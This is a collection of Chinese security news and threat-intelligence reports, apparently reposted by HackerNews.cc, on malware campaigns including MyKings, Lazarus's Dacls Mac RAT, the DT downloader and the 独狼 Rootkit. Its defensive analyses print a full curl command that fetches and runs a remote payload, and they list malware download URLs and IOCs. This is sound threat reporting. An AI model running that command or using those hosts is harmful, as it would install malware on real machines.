2019年秋，相关网站发布了一篇文章，其主要讲述了一个名为Reducor的COMpfun后继文件是如何即时感染文件以破坏TLS流量的，目前该恶意软件的开发者们还在开发新的功能。同年11月下旬，相关搜索引擎发现了一个新的木马，其之前发现的代码高度相似，经过进一步的研究表明，它使用的是与COMPFun相同的代码库。 本次恶意活动幕后操纵者聚焦于外交实体上，其目标是在欧洲。他们将最初的释放器以伪造签证申请的形式进行传播。合法的应用程序及32位或64位的恶意软件被保存在加密释放器中，但恶意代码是如何传递到目标中的这点我们尚不清楚。     …… 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1212/     消息来源：securelist， 译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

本周，欧洲突然曝出多达十数台超级计算机感染恶意挖矿软件，沦为挖矿肉鸡。据悉周一英国爱丁堡大学首先公布了ARCHER超级计算机遭到攻击的报告，表示关闭ARCHER的系统进行调查，并且为了防止再次被攻击，重置了SSH（安全外壳协议）密码。 同一天德国超级计算机管理组织bwHPC宣布因为类似的安全问题，旗下5台超级计算机/高性能计算集群bwUniCluster 2.0、ForHLR II、bwForCluster JUSTUS、bwForCluster BinAC、Hawk现起关闭。 周三安全研究员Felix von Leitner在博客中称，位于西班牙巴塞罗那的一台超级计算机也受到安全问题的影响，因此被关闭。 周四更多被感染的超级计算机浮出水面，巴伐利亚科学院下属的莱布尼兹计算中心当天表示因为安全漏洞，其管理的计算集群断开互联网连接。 当天晚些时候，德国朱利希研究中心紧接着表示由于发生“IT安全事件”，必须关闭旗下JURECA，JUDAC和JUWELS超级计算机。 就在昨天瑞士苏黎世的瑞士科学计算中心也表示在直到外部环境安全之前，将持续关闭其超级计算机的外部访问。 目前尚不清楚究竟是什么人或组织实施了这些攻击，但据安全公司分析，黑客是通过窃取SSH凭证获得了超级计算机的访问权限，而大学内部人士因为有权访问这些超级计算机而最有嫌疑。 实际上被劫持的SSH登录名分别属于加拿大、中国和波兰的大学。 而且虽然没有证据证明所有的攻击都是由同一组织实施的，但所有恶意软件的文件名和网络指示器都证明它们的源头可能是同一个地方。     （稿源：快科技，封面源自网络。）

比特梵德实验室的一支研究团队，刚刚曝光了一款名叫 Mandrake 的 Android 恶意软件。自 2016 年以来，它就一直在窃取用户的数据。Bitdefender 指出，其行为与大多数常见的威胁有所不同。Mandrake 并不致力于感染更多的设备，而是希望从用特定用户手上榨取更多的数据。从这一点来看，这款恶意软件在挑选受害者时，还算相当“挑剔”的。 与现实世界中的生物病毒一样，高传染性意味着更容易被发现。Mandrake 极力在隐藏自己，对特定受害设备的数据窃取利用到了极致。 实际上，根据 BitDefender 的深入分析，可知这款恶意软件被明确指定不得攻击某些地区的用户，包括前苏联、非洲和中东。澳大利亚被高度针对，美国、加拿大和某些欧洲国家也出现了很多感染案例。 Mandrake 于今年早些时候被首次发现，但其历史可追溯到 2016 年。据估计，当时该病毒已感染成千上万的设备，但最近一轮又扩散到了数十万人。 之所以谷歌 Play 商店迟迟未能揪出这款恶意软件，是因为 Mandrake 并未直接将这部分内容包含在程序本体。只有在接到指示之后，才会开启加载恶意行为的过程。 如此一来，它便能够避免被谷歌在早期筛查中发现。一旦将有效负载置于设备上，恶意软件便可立即窃取任何想要的数据，包括网站和应用的登陆凭据。 Mandrake 甚至可以重绘屏幕上的内容，意味着即使受害者看到了“完全正常”的页面、实际上却是在向恶意软件的幕后主使授予权限和相关数据。 Bitdefender 威胁研究和报告主管 Bogdan Botezatu 称之为“迄今为止最强大的 Android 恶意软件之一”，其最终目标是完全控制设备并染指用户账户。 为了不被发现，多年来 Mandrake 已经在谷歌 Play 商店里通过各种明目进行了传播，以及使用不同的开发者名称来打造诸多全新的应用。 此外为了给维持用户眼中“可信赖”的错误印象，开发者对“正经功能”的反馈响应也很是积极，甚至某些 App 还有与之关联的社交媒体活跃账号。 然而一旦恶意软件收集到了所有的数据，它便能够从设备上完全擦除自己的痕迹，导致用户根本不知道自己都经历了什么。 有鉴于此，我们还是建议大家尽量留意开发者的信誉是否良好，且不要通过不靠谱的平台去下载 App 。   （稿源：cnBeta，封面源自网络。）

Unit 42安全团队在过去4个月里观察到了Hangover组织(又名Neon, Viceroy Tiger, MONSOON)使用的BackConfig恶意软件的活动。该组织使用鱼叉式钓鱼攻击，目标包括南亚的政府和军事组织。 BackConfig定制木马具有灵活的插件架构，用于提供各种特性的组件，包括收集系统和键盘记录信息以及上传和执行额外payload的能力。 最初，感染是通过一个武器化的Microsoft Excel (XLS)文档发生的，该文档通过受感染的合法网站发布，url很可能是通过电子邮件共享的。这些文档使用Visual Basic for Applications (VBA)宏代码，如果受害者启用了这些宏代码，就会启动一个由多个组件组成的安装过程，从而导致插件加载程序payload被下载和执行。模块化的特性当然允许对单个组件进行更快的更改，而且对于攻击者来说可能更重要的是，能够阻止沙箱和动态分析系统的方式拆分恶意行为，尤其是在单独分析组件时。 我们基于WildFire的威胁预防平台可以检测到与此组织相关的活动，同时更新PAN-DB URL过滤解决方案中的“恶意软件”类别，用于已识别恶意的或受危害的域名。 …… 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1202/   消息来源：PaloAltoNetworks， 译者：吴烦恼。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

在我们的日常监控中，我们拦截了一个试图渗透客户网络的Linux恶意软件，该恶意软件是著的“ Shellbot ”，被定义为“ Outlaw Hacking Group”的犯罪工具。 早在2018年，TrendMicro首次发现“Outlaw Hacking Group”，该犯罪团伙主攻汽车和金融业，而Outlaw僵尸网通过暴力登录以及SSH漏洞（利用Shellshock Flaw和Drupalgeddon2漏洞）来实现对目标系统（包括服务器和IoT设备）的远程访问。其中，TrendMicro首次发现的版本还包含一个DDoS脚本，botmaster可以使用该脚的原有设置在暗网上提供的DDoS for-hire服务。 该恶意软件植入程序的主要组件是“Shellbot”变体，它是一个Monero矿机，与一个基于perl的后门捆绑在一起，包括一个基于IRC的bot和一个SSH扫描器。Shellbot自2005年被熟知，近期其出现在网络安全领域，使用的是全新的IRC服务器和全新的Monero pools，攻击目标针对全球组织。   更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1204/   消息来源：YOROI， 译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/Eyqm-lgQovFaJnk3FHihJQ 一、概述 MyKings僵尸网络2017年2月左右开始出现，该僵尸网络通过扫描互联网上 1433 及其他多个端口渗透进入受害者主机，然后传播包括DDoS、Proxy（代理服务）、RAT（远程控制木马）、Miner（挖矿木马）、暗云III在内的多种不同用途的恶意代码。由于MyKings僵尸网络主动扩散的能力较强，影响范围较广，对企业用户危害严重。 Mykings僵尸网络本轮活动主要更新点 1.新增IP、域名、URL； 2.大量采用POWERSHELL脚本进行“无文件”落地攻击； 3.在清理竞争对手挖矿木马名单中增加了“新冠”挖矿木马； 4.使用挖矿账号登陆，隐藏了钱包地址； 5.新增白利用文件； 6.不同系统版本执行脚本不同； 7.获取windows登陆密码 攻击流程图 二、解决方案 运维人员可参考以下方法手动清除Windows系统感染的挖矿木马，企业用户亦可使用腾讯T-Sec终端安全管理系统（腾讯御点）查杀病毒，参考安全建议提升服务器的安全性。 删除以下病毒文件： C:\Windows\debug\lsmose.exe C:\Windows\debug\lsmos.exe C:\Windows\debug\lsmo.exe C:\Program Files (x86)\Common Files\csrw.exe C:\Progra~1\Common Files\csrw.exe c:\windows\help\lsmosee.exe c:\windows\help\akpls.exe c:\windows\inf\lsmma.exe c:\windows\inf\lsmm.exe c:\windows\inf\lsmmaa.exe c:\windows\system32\new.exe c:\windows\system32\upsupx.exe c:\windows\inf\aspnet\lsma.exe c:\windows\inf\aspnet\lsmab.exe c:\windows\inf\aspnet\lsmaaa.exe c:\windows\inf\aspnet\lsma30.exe c:\windows\inf\aspnet\lsma31.exe c:\\windows\java\java.exe c:\windows\inf\aspnet\lsma12.exe c:\windows\debug\ok.dat c:\windows\debug\item.dat c:\windows\update.exe c:\windows\temp\servtestdos.dll C:\WINDOWS\Fonts\cd c:\windows\help\get.exe c:\windows\inf\aspnet\u.exe c:\windows\inf\winnts.exe c:\windows\temp\svchost.exe c:\windows\temp\conhost1.exe 删除病毒添加的计划任务 Mysa Mysa1 Mysa2 Mysa3 ok oka 删除病毒添加的WMI事件启动项 fuckyoumm2_filter fuckyoumm2_consumer Windows Events Filter Windows Events Consumer4 Windows Events Consumer fuckayoumm3 fuckayoumm4 安全建议 1.Mysql端口非必要情况不要暴露在公网，使用足够强壮的Mysql口令； 2.修复MS010-17“永恒之蓝”漏洞，服务器暂时关闭不必要的端口（如135、139、445）。 三、详细分析 mykings本次活动通过mssql爆破手段攻击windows服务器，根据系统版本下发不同的脚本。 WIN10以下主要是对windows defender有关闭操作，并且会使用mimikatz导出windows密码。各系统对应的脚本下载链接： Windows 10，http://173.208.139.170:8170/win10.txt Windows 服务器，http://173.208.139.170:8170/sa.xsl Windows xp，http://173.208.139.170:8170/s.xsl Win Vista~Win8，http://173.208.139.170:8170/abc.txt 脚本入口处搜集IP，进程，内存，处理器信息，上传到FTP 接着下载batpower.txt Batpower首先下载kill.txt，主要作用是清理自身旧版本挖矿程序，以固定阵地，删除相应文件： 清理wmi启动项 下载uninstall.txt，卸载多款主流杀毒软件： 之后去ftp服务器下载三个挖矿木马文件，并设置成计划任务： 下载并设置v.sct开机启动，目前无法连接，具体功能暂时无法得知 继续下载执行wmi.txt，主要设置开机下载执行power.txt，s.txt Power.txt及s.txt有多个地址可供下载 Power.txt功能与batpower.txt功能一样。 s.txt会去下载hxxp://173.208.153.130:8130/wpd.rar，这是一个自解压文件，主要功能是清除竞争对手挖矿木马，如：NSABuffMiner、kingminer，还有最新的“新冠”挖矿木马 “coronav2“。 后下载执行hxxp://167.88.180.175:8175/download.txt，里面也会执行挖矿木马。 链接中的g.exe是pplive的loader模块，用做白利用，以下载并执行其他病毒模块。 该模块会根据命令行下载执行文件，不会做任何验证。 u.exe首先获取mirai僵尸网络下载IP 再获取更新地址： 扫描工具msinfo，并对公网和内网进行扫描攻击，包括使用永恒之蓝漏洞、SQL爆破、Telnet爆破、RDP爆破等多种手段： Mirai携带的永恒之蓝攻击模块 max.exe则是暗云Ⅲ木马，攻击流程无变化。 暗云Ⅲ的更新域名及下载链接 1201.exe是基于xmrig 2.0.4版本修改而来，矿机配置存放在资源段TXT中 “url”: “69.197.156.194:80”, “user”: “abc443”, “pass”: “x”, “url”: “win443.xmrpool.ru:443”, “user”: “abcd1443”, “pass”: “x”, 附录 IOCs MD5 74a09ef83de2599529c9a6f0278fdb60 9f86afae88b2d807a71f442891dfe3d4 929c393fcfb72f9af56ce34df88f82bb 539d218039ad0a2c6bf541af95a013bc a8c98125b9d04673f079bcc717e58a71 5364fae1de8db8fa3faf07bfaf2b706f b150d411a1e29e43b6423f19db4fd3ed 94d5e03b2d21f8f0c6d963570ecba6c1 5d461acc19ac7d2a993ddf0d8866cb1a 93515e391ac22a065279cadd8551d2bc bc7fc83ce9762eb97dc28ed1b79a0a10 d9c32681d65c18d9955f5db42154a0f3 f89cbaf4dbe490787adf5eeb9304d785 44ac832c2b71b4874e544e2b04a72834 6d0bb14c2f5a384bd5073a45db12dabe fa74df0a9a42d29018146520ae0b5585 9459494db3750da9fab3d9deaf4d1106 598ba6f7a900a78666bcb9774620f643 2293f46b3c293e5c637343447e582fdb 8e8f427d93e809137283abfad825b33d b6c1dacca555c61a26907296a04d10de a1783a56738b17ba117b5518399748b0 64ce5ad470cfa503882a3dfac382c6b4 a26ba601674371229eab93a585a79e6b 5c56774156b5fefe2e465b4546006f9a 61e1f73f2e8f566f959e3ffca120aa8b a8557ea0f4034ecf855087e3200354ac 2da63739662c5ea7231c930b61f73a72 5e87427c66ecb84a85700b1180d115f2 f18e88259b1043a6e06c9a16d4c0475e 1a7dcb9970287539774c7ade1cb7e483 e827621c5185488122da57ac16d1fca0 795dd160e8073d23f5c6954602bf3b89 a5b75dfb3b3358ad1a2ef8025ddebb29 cfa550296b848293f912fd625c114015 IP 208.110.71.194 80.85.152.247 66.117.2.182 70.39.124.70 150.107.76.227 103.213.246.23 103.106.250.161 103.106.250.162 144.208.127.215 167.88.180.175 172.83.155.170 173.208.133.114 173.208.153.130 173.247.239.186 192.236.160.237 199.168.100.74 23.236.69.114 74.222.14.97 66.117.6.174 DOMAIN www.upme0611.info mbr.kill0604.ru js.ftp1202.site wmi.1103bye.xyz ok.xmr6b.ru URL hxxp://167.88.180.175:8175/kill.txt hxxp://js.ftp1202.site:280/v.sct hxxp://167.88.180.175:8175/wmi.txt hxxp://173.208.153.130:8130/wpd.rar hxxp://167.88.180.175:8175/download.txt hxxp://js.ftp1202.site:280/v.sct hxxp://wmi.1103bye.xyz:8080/power.txt hxxp://172.83.155.170:8170/power.txt hxxp://192.236.160.237:8237/power.txt hxxp://144.208.127.215:8215/power.txt hxxp://103.106.250.161:8161/power.txt hxxp://103.106.250.162:8162/power.txt hxxp://144.208.127.215:8215/s.txt hxxp://103.106.250.161:8161/s.txt hxxp://172.83.155.170:8170/s.txt hxxp://192.236.160.237:8237/s.txt hxxp://103.106.250.162:8162/s.txt hxxp://wmi.1103bye.xyz:8080/s.txt hxxp://144.208.127.215:8215/s.txt hxxp://103.106.250.161:8161/s.txt hxxp://172.83.155.170:8170/s.txt hxxp://192.236.160.237:8237/s.txt hxxp://103.106.250.162:8162/s.txt hxxp://wmi.1103bye.xyz:8080/s.txt hxxp://173.247.239.186:8186/g.exe hxxp://173.247.239.186:8186/u.exe hxxp://199.168.100.74:8074/max.exe hxxp://199.168.100.74:8074/1201.rar hxxp://23.236.69.114:8114/dll/64npf.sys hxxp://23.236.69.114:8114/update.txt hxxp://23.236.69.114/ups.html hxxp://23.236.69.114:8114/dll/wpcap.dll hxxp://23.236.69.114:8114/dll/packet.dll hxxp://23.236.69.114:8114/dll/npptools.dll hxxp://173.208.133.114:8114/upsupx.exe hxxp://www.upme0611.info/address.txt hxxp://mbr.kill0604.ru/cloud.txt hxxp://74.222.14.97/xpxmr.dat hxxp://ok.xmr6b.ru/xpxmr.dat hxxp://ok.xmr6b.ru/ok/wpd.html hxxp://66.117.6.174/wpdmd5.txt hxxp://66.117.6.174/wpdtest.dat hxxp://66.117.6.174/ver.txt hxxp://66.117.6.174/shellver.txt hxxp://66.117.6.174/csrs.exe hxxp://23.236.69.114:8114/ups.html hxxp://66.117.6.174:8114/update.txt hxxp://66.117.6.174/wpd.jpg hxxp://66.117.6.174/my1.html hxxp://172.83.155.170:280/v.sct hxxp://139.5.177.19:8019/blue.txt 参考链接 https://s.tencent.com/research/report/622.html https://mp.weixin.qq.com/s/KdeF1eaM-Dq1z_wOIb9_oA https://www.freebuf.com/column/187489.html

有关研究团队最新发现了一种新的Dacls远程访问特洛伊木马（RAT）变种，它与朝鲜的Lazarus集团有关联，并且专门为Mac操作系统设计。 Dacls是2019年12月奇虎360 NetLab发现的一种针对Windows和Linux平台的全功能隐蔽远程访问特洛伊木马（RAT）。 这个Mac变种至少通过一个名为MinaOTP的木马化的macOS二元身份验证应用程序进行分发，该应用程序主要由中国用户使用。与Linux变种类似，它拥有多种功能，包括命令执行、文件管理、流量代理和蠕虫扫描。 发现 4月8日，一个名为“TiNakOTP”的可疑Mac应用程序从香港提交到VirusTotal，当时没有任何引擎检测到它。 恶意的bot可执行文件位于应用程序的“Contents/Resources/Base.lproj/”目录中，当它是Mac可执行文件时，它会伪装成nib文件（“SubMenu.nib”）。它包含字符串“c_2910.cls”和“k_3872.cls”，而这是以前检测到的证书和私钥文件的名称。 持久性 该RAT通过LaunchDaemons或LaunchAgents持久存在，它们采用属性列表（plist）文件，这个文件指定了重启后需要执行的应用程序。LaunchAgents和LaunchDaemons之间的区别在于，LaunchAgents代表登录用户运行代码，而LaunchDaemons以root用户运行代码。“ 当恶意应用程序启动时，它将在“Library/LaunchDaemons”目录下创建一个名称为“com.aex-loop.agent.plist”的plist文件，plist文件的内容在应用程序中进行了硬编码。 该程序还会检查“getpwuid( getuid() )”是否返回当前进程的用户ID。如果返回用户ID，它将在LaunchAgents目录“Library/LaunchAgents/”下创建plist文件“com.aex-loop.agent.plist”。 图1 plist文件 存储plist的文件名和目录为十六进制格式并附加在一起，它们向后显示文件名和目录。 图2 目录和文件名生成 配置文件 配置文件包含有关受害者计算机的信息，例如Puid、Pwuid、插件和C＆C服务器，配置文件的内容使用AES加密算法进行加密。 图3 加载配置 Mac和Linux变种都使用相同的AES密钥和IV来加密和解密配置文件，两种变种中的AES模式均为CBC。 图4 AES密钥和IV 配置文件的位置和名称以十六进制格式存储在代码中，该配置文件名称伪装成与Apple Store相关的数据库文件：“Library/Caches/Com.apple.appstore.db”。 图5 配置文件名 “IntializeConfiguration”功能使用以下硬编码的C＆C服务器初始化配置文件。 图6 初始化配置文件 通过从C＆C服务器接收命令来不断更新配置文件。安装后的应用程序名称为“mina”。Mina来自MinaOTP应用程序，它是针对macOS的双因素身份验证应用程序。 图7 配置文件正在更新 主循环 初始化配置文件后，执行主循环以执行以下四个主命令： 将C＆C服务器信息从配置文件上载到服务器（0x601） 从服务器下载配置文件内容并更新配置文件（0x602） 通过调用“getbasicinfo”函数（0x700）从受害者的计算机上传收集的信息 发送heartbeat信息（0x900） 命令代码与Linux.dacls完全相同。 图8 主循环 插件 此Mac-RAT拥有Linux变种中的所有六个插件，以及一个名为“SOCKS”的附加插件。这个新插件用于代理从受害者到C＆C服务器的网络流量。 该应用程序会在主循环开始时加载所有七个插件。每个插件在配置文件中都有自己的配置部分，将在插件初始化时加载。 图9 加载的插件 CMD插件 cmd插件类似于Linux rat中的“bash”插件，它通过为C＆C服务器提供一个反向shell来接收和执行命令。 图10 CMD插件 文件插件 文件插件具有读取、删除、下载和搜索目录中文件的功能。Mac和Linux变种之间的唯一区别是Mac变种不具有写入文件的能力（case 0）。 图11 文件插件 进程插件 进程插件具有终止、运行、获取进程ID和收集进程信息的功能。 图12 进程插件 如果可以访问进程的“ / proc /％d / task”目录，则插件将从进程获取以下信息，其中％d是进程ID： 通过执行“/ proc /％/ cmdline”获取进程的命令行参数 “/ proc /％d / status”文件中进程的名称、Uid、Gid、PPid 测试插件 Mac和Linux变种之间的测试插件的代码是相同的，它检查到C＆C服务器指定的IP和端口的连接。 RP2P插件 RP2P插件是一个代理服务器，用于避免受害者与参与者的基础设施进行直接通信。 图13 反向P2P LogSend插件 Logsend插件包含三个模块： 检查与日志服务器的连接 扫描网络（蠕虫扫描仪模块） 执行长期运行的系统命令 图14 Logsend插件 该插件使用HTTP端口请求发送收集的日志。 图15 用户代理 这个插件中一个有趣的功能是蠕虫扫描程序。“start_worm_scan”可以扫描端口8291或8292上的网络子网，要扫描的子网是基于一组预定义规则确定的。下图显示了选择要扫描的子网的过程。 图16 蠕虫扫描 Socks插件 Socks插件是此Mac Rat中新增的第七个插件，它类似于RP2P插件，并充当引导bot和C＆C基础结构之间通信的媒介，它使用Socks4进行代理通信。 图17 Socks4 网络通讯 此Mac-RAT使用的C＆C通信与Linux变种类似，为了连接到服务器，应用程序首先建立一个TLS连接，然后执行beaconing操作，最后使用RC4算法对通过SSL发送的数据进行加密。 图18 应用程序生成的流量（.mina） 图19 TLS连接 Mac和Linux变种都使用WolfSSL库进行SSL通信，WolfSSL通过C中的TLS的开源实现，支持多个平台。这个库已被多个威胁参与者使用，例如，Tropic Trooper在其Keyboys恶意软件中使用了这个库。 图20 WolfSSL 用于beaconing的命令代码与Linux.dacls中使用的代码相同，这是为了确认bot和服务器的身份。 图21 Beaconing RC4密钥是通过使用硬编码密钥生成的。 图22 RC4初始化 变体和检测 我们还确定了此RAT的另一个变体，该变体使用以下curl命令下载恶意负载：curl -k -o〜/ Library / .mina https://loneeaglerecords.com/wpcontent/uploads/2020/01/images.tgz.001>/ dev / null 2>＆1 && chmod + x〜/ Library / .mina> /dev / null 2>＆1 &&〜/ Library / .mina> / dev。 我们认为，Dcals RAT的Mac变体与Lazarus小组（也称为Hidden Cobra和APT 38）有关，Lazarus小组是自2009年以来一直从事网络间谍活动和网络犯罪的臭名昭著的朝鲜恐怖组织。 据悉，该组织是最成熟的参与者之一，能够针对不同平台定制恶意软件。这个Mac-RAT的发现表明，APT小组正在不断开发其恶意软件工具集。 Mac的Malwarebytes将该远程管理木马检测为OSX-DaclsRAT。 IOCs 899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53 846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6 216a83e54cac48a75b7e071d0262d98739c840fd8cd6d0b48a9c166b69acd57d d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd   loneeaglerecords[.]com/wp-content/uploads/2020/01/images.tgz.001 67.43.239.146 185.62.58.207 50.87.144.227   消息来源：malwarebytes， 译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/afn9jkgaDqX2wIoHk4G6JQ 一、概述 腾讯安全威胁情报中心在进行例行高广风险文件排查时，发现一个名为DTCenSvc.exe的文件异常之高，腾讯安全大数据显示已有超2万台电脑中招。经分析该文件运行后会在用户机器内安装一系列的广告弹窗程序、主页篡改程序。 溯源后发现，该病毒运行过程中的部分文件、域名等基础设置与DT下载器家族恶意传播推广资源一致。软件供应链传播病毒国内时有发生，下载器问题尤显突出。腾讯安全专家提醒用户避免从易受污染的软件下载站下载，高风险下载渠道极易感染挖矿木马、勒索软件、广告弹窗、浏览器主页被锁等问题。 二、解决方案 互联网上充斥各种小众软件分发渠道，这些渠道或良莠不齐，或管理混乱，用户通过这些小众渠道搜索下载软件时，极易感染病毒木马，被捆绑安装不需要的其他软件。 腾讯安全专家建议网民尽可能通过相应软件的官方网站下载软件，或者使用安全软件提供的软件管理功能搜索下载相应软件。腾讯电脑管家及腾讯T-Sec终端安全管理系统已升级查杀DT下载器木马，内置的软件管理功能提供高速下载、自动去除插件安装、自动卸载恶意软件、管理软件的自动开机加载及广告弹出等特色功能。 三、病毒样本分析 DTCenSvc.exe运行后会释放执行yDwpSvc.exe模块，并将其设置为服务启动。yDwpSvc则通过地址hxxp://down.hao3603.com/rcsvccfg10.ini获取配置文件，并拉取配置中的文件执行。 目前配置中保存了两个RUL，分别为： hxxp://down.hao3603.com/qd/MiniSetup.exe链接内的MiniSetup安装包文件，hxxp://down.hao3603.com/qd/ObtainSysInfo.exe链接内的ObtainSysInfo包文件。 MiniSetup.exe包运行后会在系统内安装广告弹窗相关模块，包含一个Mini页弹窗，一个窗口右下角弹窗。但由于两个弹窗均无来源标识说明，部分用户也难以对其进行卸载删除，用户看到此类广告后会感到极度反感。 ObtainSysInfo.exe是一个主页修改相关的包程序，该程序运行后会首先检查环境内是否有安全软件相关进程，如果判断当前运行环境处于安全软件保护中。则不执行后续浏览器主页相关配置等修改逻辑。否则进一步通过从云端两次拉取加密包，解密解压缩后内存中执行DLL恶意代码。进而修改感染病毒机器内的主页，收藏等信息。 ObtainSysInfo.exe运行后会首先避开安全软件进程，安全软件进程字串使用循环异或1-5的方式动态解密后再使用 循环异或1-5后解密出如下安全软件进程 随后通过地址hxxp://down.1230578.com/UpdateProfile.7z拉取加密的包文件 通过在内存中对加密后的UpdateProfile.7z进行解密解压缩后得到名为SetVecfun.dll并执行其导出函数plugin_lock SetVecfun.Dll模块其plugin_lock内代码执行后会进一步再次拉取 hxxp://down.1230578.com/SetFunVec.7z地址内的加密包文件，解密解压后内存调用其内的浏览器修改相关接口函数。 再次Dump后可知该Dll提供了各浏览器的修改接口供调用者使用，主要通过修改注册表信息，修改浏览器配置信息，修改浏览器本地数据库信息等方式。进而达到对各浏览器的主页，收藏，启动快捷方式进行修改。 例如通过修改谷歌浏览器配置文件修改主页信息，通过注册表相关位置修改IE浏览器主页等。部分安全软件监控下的敏感位置在进行篡改操作时同样会通过进程进行环境判断从而达到避开安全软件提示的目的。 被劫持的浏览器主页地址信息会被同时保存在注册表以下位置内。 HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\llqm_* 同时还会进一步遍历TaskBar目录文件，来修改浏览器快捷方式，在其快捷方式后添加劫持参数，带到从快速启动栏启动浏览器时进入劫持主页地址 同时进一步修改了浏览器收藏文件夹信息，将大量的电商，算命等广告内容植入浏览器收藏夹内。 例如下入中浏览器主页，收藏信息已被篡改 四、病毒溯源分析 经过溯源分析，我们找到了一个同样会传播病毒相关模块的某款下载器的早期版本，该早期版本下载器同样会释放名为DTPageSet.Exe的模块执行。 比对可知，本次传播的病毒ObtainSysInfo.exe模块同下载器释放的DTPageSet.Exe拥有基本一致的代码内容，且本地病毒使用的hxxp://down.1230578.com/SetFunVec.7z恶意代码投递地址与下载器hxxp://down.1230578.com/DTPageSet.exe域名一致。 该下载器同样存在恶意修改浏览器主页信息，静默推装多款应用的行为，会在用户电脑静默安装病毒文件和推广安装用户不需要的多个软件。 附录 IOCs MD5： aa8c5fffd2de7bd7c39f90a9392d8db0 7348a00072d3d45e6006d7945744d962 fbb1a7653d715b8f56e54917adb2450e b6efb80f8c28a9c95fa3353d534c13d8 b1766aad514d1d84d3ed360c35d88f78 Domain: down.hao3603.com down.1230578.com URL: hxxp://down.hao3603.com/qd/MiniSetup.exe hxxp://down.hao3603.com/qd/ObtainSysInfo.exe hxxp://down.1230578.com/SetFunVec.7z hxxp://down.1230578.com/UpdateProfile.7z hxxp://down.1230578.com/DTPageSet.exe

目前，一场严重的黑客攻击行动正在进行中，已经有数十家公司被黑客攻击。在过去的24小时里，黑客们一直在互联网上大规模扫描Salt，这是一种用于管理和自动化数据中心、云服务器集群和企业网络内部服务器的软件。 攻击者一直在利用最近被修补的两个BUG来访问Salt服务器，然后部署一个加密货币矿机。今天早些时候，据ZDNet报道，黑客成功入侵了移动操作系统LineageOS的服务器。在我们最初报道后的几个小时后，第二个重大黑客事件浮出水面。第二个受害者是Ghost，这是一个基于Node.js的博客平台，据称是WordPress更简单的替代品。在一个状态页面中，Ghost开发团队表示，他们在UTC凌晨1点30分左右检测到了黑客入侵他们的后端基础设施系统。 Ghost开发人员表示，黑客利用CVE-2020-11651（身份验证绕过）和CVE-2020-11652（目录遍历）来控制其Salt主服务器。该博客公司表示，虽然黑客能够访问Ghost(Pro)网站和Ghost.org计费服务，但他们没有窃取任何财务信息或用户凭证。相反，Ghost表示，黑客们安装了一个加密货币挖矿器。Ghost开发人员表示：”这次挖矿尝试使我们的CPU使用率激增，并迅速使我们大部分系统超载，这让我们立即警觉到了这个问题。” 与LineageOS类似，Ghost开发者们在几个小时后，拿下了所有服务器，打了系统补丁，并在几个小时后重新部署并且重新上线。 一位安全研究员表示，这些攻击很可能是通过自动漏洞扫描器进行的，该扫描器检测到了过时的Salt安装，然后自动利用这两个漏洞安装了加密货币恶意软件。   （稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/MchLCxba26Z0KMZthv-uLA 一、概述 腾讯安全威胁情报中心检测发现，UU页游助手通过其软件升级通道，传播独狼Rootkit病毒。独狼Rootkit家族是一个长期依赖第三方Ghost镜像传播的恶性锁主页后门病毒。本次由于通过借助UU页游助手推广渠道流氓传播，使得独狼Rootkit病毒在短时间内感染量激增，受害网民已过万，分布在全国各地。中毒电脑会出现莫名其妙安装不请自来的软件、频繁弹出广告、浏览器主页被锁定等现象。 二、病毒分析 UU页游助手安装完毕后，会在安装目录内安装名为PopTip.exe的模块，该模块负责与hxxp://update.uuyyzs.com/query_action.php页面通信。 PopTip.exe模块负责拉取弹窗广告信息、托盘广告信息、升级信息等，例如下图中从云端拉取的Mini页信息。 由于广告窗口没有显示厂商标识，没有广告来源信息，该软件在系统托盘区闪动消息提示，点击后会自动创建桌面页游图标，这些行为令用户十分反感。而PopTip.exe模块提供的升级功能，较多使用了流氓手段恶意推广安装，其中甚至包含病毒木马文件。 PopTip.exe模块通过“虚假更新提示”的弹出框恶意推装用户不需要的软件：该窗口右上角的关闭按钮，无论如何点击均无法关闭，该弹出框强迫用户点击升级完成按钮。该窗口还默认勾选两个文字描述模糊，颜色极浅的可选项。放大图片发现分别为亿迅图片转换器和数据优化。用户点击完成，UU游戏助手则进行全程静默安装行为。 当前版本的poptip.exe模块通过以下两个地址，拉取推装程序到Roaming目录静默安装执行： hxxp://www.fikuu.com/app/YXConvert_105301.exe（亿迅图片转换器） Hxxp://www.jia7788.top:7788/new/a109.exe（数据优化服务：实际为病毒文件） a109.exe模块会判断当前系统内是否包含安全软件的进程，当进程存在则向其窗口发送WM_QUIT尝试退出相关进程，同时该模块通过拉起系统svchost.exe作为傀儡进程执行恶意代码，释放随机名的驱动程序。或下载执行xww999.exe执行释放随机名驱动程序，将独狼Rootkit模块植入到系统内。 独狼Rootkit病毒，该病毒的特点之一是通过创建Minifilter文件过滤系统，用户使用系统文件管理器就会发现Drivers目录不可见，同时将所有访问病毒驱动随机名母体文件的请求重定向到系统acpi.sys文件。意思是，当你试图查看那些莫名其妙进来的随机文件名驱动文件时，你看到的实际是acpi.sys。 独狼Rootkit模块最终通过插APC的方式向浏览器进程注入恶意代码达到主页劫持、后门代码驻留等恶意行为。 独狼rootkit病毒会向浏览器进程注入恶意代码，实现劫持浏览器启动命令行，达到主页劫持的目的。 